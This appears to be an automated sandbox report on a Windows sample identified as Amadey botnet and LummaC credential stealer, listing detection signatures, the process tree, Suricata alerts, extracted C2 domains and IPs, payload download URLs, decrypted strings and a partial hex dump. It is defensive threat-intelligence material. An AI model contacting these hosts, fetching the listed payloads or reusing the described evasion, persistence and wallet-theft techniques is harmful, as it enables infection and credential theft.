Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
file.exe

Overview

General Information

Sample name:file.exe
Analysis ID:1571005
MD5:41f7104e635f418ec5a33d817b5324d9
SHA1:7c9a3124d4bf236a560c6a865b0034f79a65f875
SHA256:3301f21b0e9b43873293f712c6a8eccb7746c09207e0cedcfe836d060862c6f8
Tags:exeuser-Bitsight
Infos:

Detection

Amadey, LummaC Stealer
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Antivirus detection for dropped file
Detected unpacking (changes PE section rights)
Found malware configuration
Multi AV Scanner detection for dropped file
Suricata IDS alerts for network traffic
Yara detected Amadeys stealer DLL
Yara detected LummaC Stealer
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Creates multiple autostart registry keys
Found evasive API chain (may stop execution after reading information in the PEB, e.g. number of processors)
Found many strings related to Crypto-Wallets (likely being stolen)
Hides threads from debuggers
Machine Learning detection for dropped file
Machine Learning detection for sample
PE file contains section with special chars
Potentially malicious time measurement code found
Query firmware table information (likely to detect VMs)
Sample uses string decryption to hide its real strings
Sigma detected: New RUN Key Pointing to Suspicious Folder
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
AV process strings found (often used to terminate AV products)
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Checks for debuggers (devices)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to call native functions
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Creates files inside the system directory
Creates job files (autostart)
Detected potential crypto function
Downloads executable code via HTTP
Drops PE files
Enables debug privileges
Entry point lies outside standard sections
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains an invalid checksum
PE file contains more sections than normal
PE file contains sections with non-standard names
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Searches for user specific document files
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Startup Folder File Write
Stores files to the Windows start menu directory
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer

Classification

  • System is w10x64
  • file.exe (PID: 6864 cmdline: "C:\Users\user\Desktop\file.exe" MD5: 41F7104E635F418EC5A33D817B5324D9)
    • skotes.exe (PID: 4144 cmdline: "C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe" MD5: 41F7104E635F418EC5A33D817B5324D9)
  • skotes.exe (PID: 1308 cmdline: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe MD5: 41F7104E635F418EC5A33D817B5324D9)
  • skotes.exe (PID: 7672 cmdline: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe MD5: 41F7104E635F418EC5A33D817B5324D9)
    • 0tClIDb.exe (PID: 7872 cmdline: "C:\Users\user\AppData\Local\Temp\1013229001\0tClIDb.exe" MD5: 6367FB8A64F997BE8D65536534BDD057)
      • 9DNEMG3H6COYF8VY.exe (PID: 8172 cmdline: "C:\Users\user\AppData\Local\Temp\9DNEMG3H6COYF8VY.exe" MD5: 3A14DCD85C597F6B51F3B5687D1043FA)
        • NvidiaDriver.exe (PID: 6940 cmdline: "C:\Users\user\AppData\Local\Temp\NvidiaDriver\NvidiaDriver.exe" MD5: 3A14DCD85C597F6B51F3B5687D1043FA)
          • InternetDriver.exe (PID: 6868 cmdline: "C:\Users\user\AppData\Local\Temp\NvidiaDriver\InternetDriver.exe" --vision MD5: 3A14DCD85C597F6B51F3B5687D1043FA)
          • 184f72cd859c47b29124ab7c76766326.exe (PID: 7216 cmdline: "C:\Users\user\AppData\Local\Temp\NvidiaDriver\184f72cd859c47b29124ab7c76766326.exe" MD5: 7CB559130BBD743D4CDB0891749C5643)
            • conhost.exe (PID: 3156 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • NvidiaDriver.exe (PID: 5596 cmdline: "C:\Users\user\AppData\Local\Temp\NvidiaDriver\NvidiaDriver.exe" --vision MD5: 3A14DCD85C597F6B51F3B5687D1043FA)
  • NvidiaDriver.exe (PID: 5576 cmdline: "C:\Users\user\AppData\Local\Temp\NvidiaDriver\NvidiaDriver.exe" --vision MD5: 3A14DCD85C597F6B51F3B5687D1043FA)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
AmadeyAmadey is a botnet that appeared around October 2018 and is being sold for about $500 on Russian-speaking hacking forums. It periodically sends information about the system and installed AV software to its C2 server and polls to receive orders from it. Its main functionality is that it can load other payloads (called "tasks") for all or specifically targeted computers compromised by the malware.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.amadey
{"C2 url": ["dwell-exclaim.biz", "formy-spill.biz", "zinc-sneark.biz", "impend-differ.biz", "se-blurry.biz", "print-vexer.biz", "dare-curbys.biz", "covery-mover.biz"]}
{"C2 url": "185.215.113.43/Zu7JuNko/index.php", "Version": "4.42", "Install Folder": "abc3bc1985", "Install File": "skotes.exe"}
SourceRuleDescriptionAuthorStrings
sslproxydump.pcapJoeSecurity_LummaCStealer_3Yara detected LummaC StealerJoe Security
    sslproxydump.pcapJoeSecurity_LummaCStealer_2Yara detected LummaC StealerJoe Security
      SourceRuleDescriptionAuthorStrings
      00000002.00000002.1728325404.0000000000AC1000.00000040.00000001.01000000.00000007.sdmpJoeSecurity_Amadey_2Yara detected Amadey\'s stealer DLLJoe Security
        00000000.00000002.1693695905.0000000000491000.00000040.00000001.01000000.00000003.sdmpJoeSecurity_Amadey_2Yara detected Amadey\'s stealer DLLJoe Security
          00000006.00000002.2883431001.0000000000AC1000.00000040.00000001.01000000.00000007.sdmpJoeSecurity_Amadey_2Yara detected Amadey\'s stealer DLLJoe Security
            00000001.00000002.1724017680.0000000000AC1000.00000040.00000001.01000000.00000007.sdmpJoeSecurity_Amadey_2Yara detected Amadey\'s stealer DLLJoe Security
              Process Memory Space: 0tClIDb.exe PID: 7872JoeSecurity_LummaCStealer_3Yara detected LummaC StealerJoe Security
                Click to see the 3 entries
                SourceRuleDescriptionAuthorStrings
                1.2.skotes.exe.ac0000.0.unpackJoeSecurity_Amadey_2Yara detected Amadey\'s stealer DLLJoe Security
                  6.2.skotes.exe.ac0000.0.unpackJoeSecurity_Amadey_2Yara detected Amadey\'s stealer DLLJoe Security
                    0.2.file.exe.490000.0.unpackJoeSecurity_Amadey_2Yara detected Amadey\'s stealer DLLJoe Security
                      2.2.skotes.exe.ac0000.0.unpackJoeSecurity_Amadey_2Yara detected Amadey\'s stealer DLLJoe Security

                        System Summary

                        barindex
                        Source: Registry Key setAuthor: Florian Roth (Nextron Systems), Markus Neis, Sander Wiebing: Data: Details: "C:\Users\user\AppData\Local\Temp\NvidiaDriver\NvidiaDriver.exe", EventID: 13, EventType: SetValue, Image: C:\Users\user\AppData\Local\Temp\9DNEMG3H6COYF8VY.exe, ProcessId: 8172, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\InternetDriver_db0ad8af55074ec6a35fe3c2f19759be
                        Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: "C:\Users\user\AppData\Local\Temp\NvidiaDriver\NvidiaDriver.exe", EventID: 13, EventType: SetValue, Image: C:\Users\user\AppData\Local\Temp\9DNEMG3H6COYF8VY.exe, ProcessId: 8172, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\InternetDriver_db0ad8af55074ec6a35fe3c2f19759be
                        Source: File createdAuthor: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research): Data: EventID: 11, Image: C:\Users\user\AppData\Local\Temp\9DNEMG3H6COYF8VY.exe, ProcessId: 8172, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\InternetDriver_cef09dcf6b774f79a4710801a7f389d4.lnk
                        TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                        2024-12-08T18:06:16.984431+010020283713Unknown Traffic192.168.2.449782172.67.165.166443TCP
                        2024-12-08T18:06:19.035021+010020283713Unknown Traffic192.168.2.449788172.67.165.166443TCP
                        2024-12-08T18:06:21.479655+010020283713Unknown Traffic192.168.2.449795172.67.165.166443TCP
                        2024-12-08T18:06:23.869780+010020283713Unknown Traffic192.168.2.449802172.67.165.166443TCP
                        2024-12-08T18:06:26.419153+010020283713Unknown Traffic192.168.2.449810172.67.165.166443TCP
                        2024-12-08T18:06:29.112582+010020283713Unknown Traffic192.168.2.449819172.67.165.166443TCP
                        2024-12-08T18:06:31.476507+010020283713Unknown Traffic192.168.2.449826172.67.165.166443TCP
                        2024-12-08T18:06:35.143703+010020283713Unknown Traffic192.168.2.449834172.67.165.166443TCP
                        2024-12-08T18:06:37.916093+010020283713Unknown Traffic192.168.2.449845104.21.9.168443TCP
                        2024-12-08T18:06:52.656290+010020283713Unknown Traffic192.168.2.449886104.21.81.153443TCP
                        2024-12-08T18:06:54.647885+010020283713Unknown Traffic192.168.2.449893104.21.81.153443TCP
                        TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                        2024-12-08T18:06:17.744416+010020546531A Network Trojan was detected192.168.2.449782172.67.165.166443TCP
                        2024-12-08T18:06:19.936454+010020546531A Network Trojan was detected192.168.2.449788172.67.165.166443TCP
                        2024-12-08T18:06:36.233362+010020546531A Network Trojan was detected192.168.2.449834172.67.165.166443TCP
                        2024-12-08T18:06:53.390663+010020546531A Network Trojan was detected192.168.2.449886104.21.81.153443TCP
                        TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                        2024-12-08T18:06:17.744416+010020498361A Network Trojan was detected192.168.2.449782172.67.165.166443TCP
                        2024-12-08T18:06:53.390663+010020498361A Network Trojan was detected192.168.2.449886104.21.81.153443TCP
                        TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                        2024-12-08T18:06:19.936454+010020498121A Network Trojan was detected192.168.2.449788172.67.165.166443TCP
                        TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                        2024-12-08T18:06:16.984431+010020579221Domain Observed Used for C2 Detected192.168.2.449782172.67.165.166443TCP
                        2024-12-08T18:06:19.035021+010020579221Domain Observed Used for C2 Detected192.168.2.449788172.67.165.166443TCP
                        2024-12-08T18:06:21.479655+010020579221Domain Observed Used for C2 Detected192.168.2.449795172.67.165.166443TCP
                        2024-12-08T18:06:23.869780+010020579221Domain Observed Used for C2 Detected192.168.2.449802172.67.165.166443TCP
                        2024-12-08T18:06:26.419153+010020579221Domain Observed Used for C2 Detected192.168.2.449810172.67.165.166443TCP
                        2024-12-08T18:06:29.112582+010020579221Domain Observed Used for C2 Detected192.168.2.449819172.67.165.166443TCP
                        2024-12-08T18:06:31.476507+010020579221Domain Observed Used for C2 Detected192.168.2.449826172.67.165.166443TCP
                        2024-12-08T18:06:35.143703+010020579221Domain Observed Used for C2 Detected192.168.2.449834172.67.165.166443TCP
                        TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                        2024-12-08T18:06:52.656290+010020579841Domain Observed Used for C2 Detected192.168.2.449886104.21.81.153443TCP
                        2024-12-08T18:06:54.647885+010020579841Domain Observed Used for C2 Detected192.168.2.449893104.21.81.153443TCP
                        TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                        2024-12-08T18:06:17.241805+010020446961A Network Trojan was detected192.168.2.449781185.215.113.4380TCP
                        TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                        2024-12-08T18:06:15.190263+010020579211Domain Observed Used for C2 Detected192.168.2.4514541.1.1.153UDP
                        TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                        2024-12-08T18:06:50.636415+010020579691Domain Observed Used for C2 Detected192.168.2.4590901.1.1.153UDP
                        TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                        2024-12-08T18:06:51.028330+010020579831Domain Observed Used for C2 Detected192.168.2.4587991.1.1.153UDP
                        TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                        2024-12-08T18:06:29.860901+010020480941Malware Command and Control Activity Detected192.168.2.449819172.67.165.166443TCP
                        TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                        2024-12-08T18:06:05.522349+010028561471A Network Trojan was detected192.168.2.449753185.215.113.4380TCP
                        TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                        2024-12-08T18:06:15.649889+010028561221A Network Trojan was detected185.215.113.4380192.168.2.449759TCP
                        TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                        2024-12-08T18:06:09.970923+010028033053Unknown Traffic192.168.2.44976531.41.244.1180TCP
                        2024-12-08T18:06:47.665769+010028033053Unknown Traffic192.168.2.449868104.21.9.168443TCP

                        Click to jump to signature section

                        Show All Signature Results

                        AV Detection

                        barindex
                        Source: file.exeAvira: detected
                        Source: impend-differ.bizURL Reputation: Label: malware
                        Source: https://se-blurry.biz/apiAvira URL Cloud: Label: malware
                        Source: http://31.41.244.11/files/806475321/0tClIDb.exeRXAvira URL Cloud: Label: malware
                        Source: http://185.215.113.43/Zu7JuNko/index.phpdedtAvira URL Cloud: Label: malware
                        Source: https://se-blurry.biz/9Avira URL Cloud: Label: malware
                        Source: https://atten-supporse.biz/apiu(Avira URL Cloud: Label: malware
                        Source: https://atten-supporse.biz/JAvira URL Cloud: Label: malware
                        Source: http://31.41.244.11/files/806475321/0tClIDb.exeso~Avira URL Cloud: Label: malware
                        Source: https://gamertool.eu/LKSM.exeAvira URL Cloud: Label: malware
                        Source: http://185.215.113.43/Zu7JuNko/index.php29001Avira URL Cloud: Label: malware
                        Source: https://atten-supporse.biz/YAvira URL Cloud: Label: malware
                        Source: http://31.41.244.11/files/806475321/0tClIDb.exeAvira URL Cloud: Label: malware
                        Source: http://185.215.113.43/Zu7JuNko/index.php3229001Avira URL Cloud: Label: malware
                        Source: https://atten-supporse.biz/gAvira URL Cloud: Label: malware
                        Source: https://atten-supporse.biz/apidjdAvira URL Cloud: Label: malware
                        Source: https://se-blurry.biz/apinAvira URL Cloud: Label: malware
                        Source: https://se-blurry.biz/hAvira URL Cloud: Label: malware
                        Source: https://se-blurry.biz/Avira URL Cloud: Label: malware
                        Source: https://atten-supporse.biz/api2Avira URL Cloud: Label: malware
                        Source: https://atten-supporse.biz/zAvira URL Cloud: Label: malware
                        Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeAvira: detection malicious, Label: TR/Crypt.TPM.Gen
                        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\0tClIDb[1].exeAvira: detection malicious, Label: TR/Crypt.XPACK.Gen
                        Source: C:\Users\user\AppData\Local\Temp\1013229001\0tClIDb.exeAvira: detection malicious, Label: TR/Crypt.XPACK.Gen
                        Source: 00000002.00000002.1728325404.0000000000AC1000.00000040.00000001.01000000.00000007.sdmpMalware Configuration Extractor: Amadey {"C2 url": "185.215.113.43/Zu7JuNko/index.php", "Version": "4.42", "Install Folder": "abc3bc1985", "Install File": "skotes.exe"}
                        Source: 13.2.184f72cd859c47b29124ab7c76766326.exe.32c0000.1.raw.unpackMalware Configuration Extractor: LummaC {"C2 url": ["dwell-exclaim.biz", "formy-spill.biz", "zinc-sneark.biz", "impend-differ.biz", "se-blurry.biz", "print-vexer.biz", "dare-curbys.biz", "covery-mover.biz"]}
                        Source: C:\Users\user\AppData\Local\Temp\9DNEMG3H6COYF8VY.exeReversingLabs: Detection: 78%
                        Source: C:\Users\user\AppData\Local\Temp\NvidiaDriver\184f72cd859c47b29124ab7c76766326.exeReversingLabs: Detection: 33%
                        Source: C:\Users\user\AppData\Local\Temp\NvidiaDriver\InternetDriver.exeReversingLabs: Detection: 78%
                        Source: C:\Users\user\AppData\Local\Temp\NvidiaDriver\NvidiaDriver.exeReversingLabs: Detection: 78%
                        Source: Submited SampleIntegrated Neural Analysis Model: Matched 99.2% probability
                        Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeJoe Sandbox ML: detected
                        Source: C:\Users\user\AppData\Local\Temp\NvidiaDriver\184f72cd859c47b29124ab7c76766326.exeJoe Sandbox ML: detected
                        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\0tClIDb[1].exeJoe Sandbox ML: detected
                        Source: C:\Users\user\AppData\Local\Temp\1013229001\0tClIDb.exeJoe Sandbox ML: detected
                        Source: file.exeJoe Sandbox ML: detected
                        Source: 00000007.00000002.2680219750.0000000000DD1000.00000040.00000001.01000000.00000009.sdmpString decryptor: impend-differ.biz
                        Source: 00000007.00000002.2680219750.0000000000DD1000.00000040.00000001.01000000.00000009.sdmpString decryptor: print-vexer.biz
                        Source: 00000007.00000002.2680219750.0000000000DD1000.00000040.00000001.01000000.00000009.sdmpString decryptor: dare-curbys.biz
                        Source: 00000007.00000002.2680219750.0000000000DD1000.00000040.00000001.01000000.00000009.sdmpString decryptor: covery-mover.biz
                        Source: 00000007.00000002.2680219750.0000000000DD1000.00000040.00000001.01000000.00000009.sdmpString decryptor: formy-spill.biz
                        Source: 00000007.00000002.2680219750.0000000000DD1000.00000040.00000001.01000000.00000009.sdmpString decryptor: dwell-exclaim.biz
                        Source: 00000007.00000002.2680219750.0000000000DD1000.00000040.00000001.01000000.00000009.sdmpString decryptor: zinc-sneark.biz
                        Source: 00000007.00000002.2680219750.0000000000DD1000.00000040.00000001.01000000.00000009.sdmpString decryptor: se-blurry.biz
                        Source: 00000007.00000002.2680219750.0000000000DD1000.00000040.00000001.01000000.00000009.sdmpString decryptor: atten-supporse.biz
                        Source: 00000007.00000002.2680219750.0000000000DD1000.00000040.00000001.01000000.00000009.sdmpString decryptor: lid=%s&j=%s&ver=4.0
                        Source: 00000007.00000002.2680219750.0000000000DD1000.00000040.00000001.01000000.00000009.sdmpString decryptor: TeslaBrowser/5.5
                        Source: 00000007.00000002.2680219750.0000000000DD1000.00000040.00000001.01000000.00000009.sdmpString decryptor: - Screen Resoluton:
                        Source: 00000007.00000002.2680219750.0000000000DD1000.00000040.00000001.01000000.00000009.sdmpString decryptor: - Physical Installed Memory:
                        Source: 00000007.00000002.2680219750.0000000000DD1000.00000040.00000001.01000000.00000009.sdmpString decryptor: Workgroup: -
                        Source: file.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                        Source: unknownHTTPS traffic detected: 172.67.165.166:443 -> 192.168.2.4:49782 version: TLS 1.2
                        Source: unknownHTTPS traffic detected: 172.67.165.166:443 -> 192.168.2.4:49788 version: TLS 1.2
                        Source: unknownHTTPS traffic detected: 172.67.165.166:443 -> 192.168.2.4:49795 version: TLS 1.2
                        Source: unknownHTTPS traffic detected: 172.67.165.166:443 -> 192.168.2.4:49802 version: TLS 1.2
                        Source: unknownHTTPS traffic detected: 172.67.165.166:443 -> 192.168.2.4:49810 version: TLS 1.2
                        Source: unknownHTTPS traffic detected: 172.67.165.166:443 -> 192.168.2.4:49819 version: TLS 1.2
                        Source: unknownHTTPS traffic detected: 172.67.165.166:443 -> 192.168.2.4:49826 version: TLS 1.2
                        Source: unknownHTTPS traffic detected: 172.67.165.166:443 -> 192.168.2.4:49834 version: TLS 1.2
                        Source: unknownHTTPS traffic detected: 104.21.9.168:443 -> 192.168.2.4:49845 version: TLS 1.2
                        Source: unknownHTTPS traffic detected: 104.21.9.168:443 -> 192.168.2.4:49855 version: TLS 1.2
                        Source: unknownHTTPS traffic detected: 104.21.81.153:443 -> 192.168.2.4:49886 version: TLS 1.2
                        Source: Binary string: C:\DEV\C#\LKSM\WinApp\WinApp\obj\Release\LKSM.pdb source: 0tClIDb.exe, 0tClIDb.exe, 00000007.00000003.2678870606.00000000058A4000.00000004.00000800.00020000.00000000.sdmp, 0tClIDb.exe, 00000007.00000003.2678870606.000000000589A000.00000004.00000800.00020000.00000000.sdmp, 0tClIDb.exe, 00000007.00000002.2692361046.00000000058A4000.00000004.00000800.00020000.00000000.sdmp, 9DNEMG3H6COYF8VY.exe, 00000009.00000000.2678750378.0000000000722000.00000002.00000001.01000000.0000000A.sdmp, InternetDriver.exe.10.dr, NvidiaDriver.exe.9.dr, 9DNEMG3H6COYF8VY.exe.7.dr
                        Source: C:\Users\user\AppData\Local\Temp\NvidiaDriver\NvidiaDriver.exeFile opened: C:\Users\userJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\NvidiaDriver\NvidiaDriver.exeFile opened: C:\Users\user\AppDataJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\NvidiaDriver\NvidiaDriver.exeFile opened: C:\Users\user\AppData\Local\TempJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\NvidiaDriver\NvidiaDriver.exeFile opened: C:\Users\user\AppData\LocalJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\NvidiaDriver\NvidiaDriver.exeFile opened: C:\Users\user\AppData\Local\Temp\NvidiaDriverJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\NvidiaDriver\NvidiaDriver.exeFile opened: C:\Users\user\AppData\Local\Temp\NvidiaDriver\NvidiaDriver.exeJump to behavior

                        Networking

                        barindex
                        Source: Network trafficSuricata IDS: 2856147 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M3 : 192.168.2.4:49753 -> 185.215.113.43:80
                        Source: Network trafficSuricata IDS: 2057921 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (atten-supporse .biz) : 192.168.2.4:51454 -> 1.1.1.1:53
                        Source: Network trafficSuricata IDS: 2856122 - Severity 1 - ETPRO MALWARE Amadey CnC Response M1 : 185.215.113.43:80 -> 192.168.2.4:49759
                        Source: Network trafficSuricata IDS: 2057922 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (atten-supporse .biz in TLS SNI) : 192.168.2.4:49782 -> 172.67.165.166:443
                        Source: Network trafficSuricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.4:49781 -> 185.215.113.43:80
                        Source: Network trafficSuricata IDS: 2057922 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (atten-supporse .biz in TLS SNI) : 192.168.2.4:49788 -> 172.67.165.166:443
                        Source: Network trafficSuricata IDS: 2057922 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (atten-supporse .biz in TLS SNI) : 192.168.2.4:49795 -> 172.67.165.166:443
                        Source: Network trafficSuricata IDS: 2057922 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (atten-supporse .biz in TLS SNI) : 192.168.2.4:49802 -> 172.67.165.166:443
                        Source: Network trafficSuricata IDS: 2057922 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (atten-supporse .biz in TLS SNI) : 192.168.2.4:49810 -> 172.67.165.166:443
                        Source: Network trafficSuricata IDS: 2057922 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (atten-supporse .biz in TLS SNI) : 192.168.2.4:49819 -> 172.67.165.166:443
                        Source: Network trafficSuricata IDS: 2057922 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (atten-supporse .biz in TLS SNI) : 192.168.2.4:49826 -> 172.67.165.166:443
                        Source: Network trafficSuricata IDS: 2057922 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (atten-supporse .biz in TLS SNI) : 192.168.2.4:49834 -> 172.67.165.166:443
                        Source: Network trafficSuricata IDS: 2057935 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (impend-differ .biz) : 192.168.2.4:59090 -> 1.1.1.1:53
                        Source: Network trafficSuricata IDS: 2057969 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (impend-differ .biz) : 192.168.2.4:59090 -> 1.1.1.1:53
                        Source: Network trafficSuricata IDS: 2057945 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (se-blurry .biz) : 192.168.2.4:58799 -> 1.1.1.1:53
                        Source: Network trafficSuricata IDS: 2057983 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (se-blurry .biz) : 192.168.2.4:58799 -> 1.1.1.1:53
                        Source: Network trafficSuricata IDS: 2057946 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (se-blurry .biz in TLS SNI) : 192.168.2.4:49886 -> 104.21.81.153:443
                        Source: Network trafficSuricata IDS: 2057984 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (se-blurry .biz in TLS SNI) : 192.168.2.4:49886 -> 104.21.81.153:443
                        Source: Network trafficSuricata IDS: 2057946 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (se-blurry .biz in TLS SNI) : 192.168.2.4:49893 -> 104.21.81.153:443
                        Source: Network trafficSuricata IDS: 2057984 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (se-blurry .biz in TLS SNI) : 192.168.2.4:49893 -> 104.21.81.153:443
                        Source: Network trafficSuricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.4:49782 -> 172.67.165.166:443
                        Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49782 -> 172.67.165.166:443
                        Source: Network trafficSuricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.4:49819 -> 172.67.165.166:443
                        Source: Network trafficSuricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.4:49788 -> 172.67.165.166:443
                        Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49788 -> 172.67.165.166:443
                        Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49834 -> 172.67.165.166:443
                        Source: Network trafficSuricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.4:49886 -> 104.21.81.153:443
                        Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49886 -> 104.21.81.153:443
                        Source: Malware configuration extractorURLs: dwell-exclaim.biz
                        Source: Malware configuration extractorURLs: formy-spill.biz
                        Source: Malware configuration extractorURLs: zinc-sneark.biz
                        Source: Malware configuration extractorURLs: impend-differ.biz
                        Source: Malware configuration extractorURLs: se-blurry.biz
                        Source: Malware configuration extractorURLs: print-vexer.biz
                        Source: Malware configuration extractorURLs: dare-curbys.biz
                        Source: Malware configuration extractorURLs: covery-mover.biz
                        Source: Malware configuration extractorIPs: 185.215.113.43
                        Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Sun, 08 Dec 2024 17:06:09 GMTContent-Type: application/octet-streamContent-Length: 1892352Last-Modified: Sun, 08 Dec 2024 16:55:07 GMTConnection: keep-aliveETag: "6755cf6b-1ce000"Accept-Ranges: bytesData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 07 00 62 af 50 67 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 00 00 c6 03 00 00 ac 00 00 00 00 00 00 00 90 4a 00 00 10 00 00 00 00 00 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 c0 4a 00 00 04 00 00 5d 07 1d 00 02 00 40 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 5c 30 05 00 70 00 00 00 00 20 05 00 b0 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 31 05 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 